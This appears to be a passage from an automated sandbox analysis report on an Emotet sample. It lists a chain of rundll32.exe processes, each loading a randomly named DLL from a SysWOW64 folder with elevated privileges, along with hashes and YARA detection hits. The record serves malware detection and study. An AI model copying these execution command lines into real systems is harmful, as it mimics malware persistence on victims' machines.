                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2113145679.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 3056 Parent PID: 2916

                                            General

                                            Start time:08:44:52
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iiasa\gdao.xuk',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2114433259.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2836 Parent PID: 3056

                                            General

                                            Start time:08:44:53
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2115843341.0000000000470000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2276 Parent PID: 2836

                                            General

                                            Start time:08:44:53
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2116824052.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2968 Parent PID: 2276

                                            General

                                            Start time:08:44:54
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2120152287.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 3020 Parent PID: 2968

                                            General

                                            Start time:08:44:55
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2123134959.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Analysis Process: rundll32.exe PID: 2248 Parent PID: 3020

                                            General

                                            Start time:08:44:56
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqftsc\netes.ucb',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2352632908.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security

                                            Disassembly

                                            Code Analysis

                                            Reset < >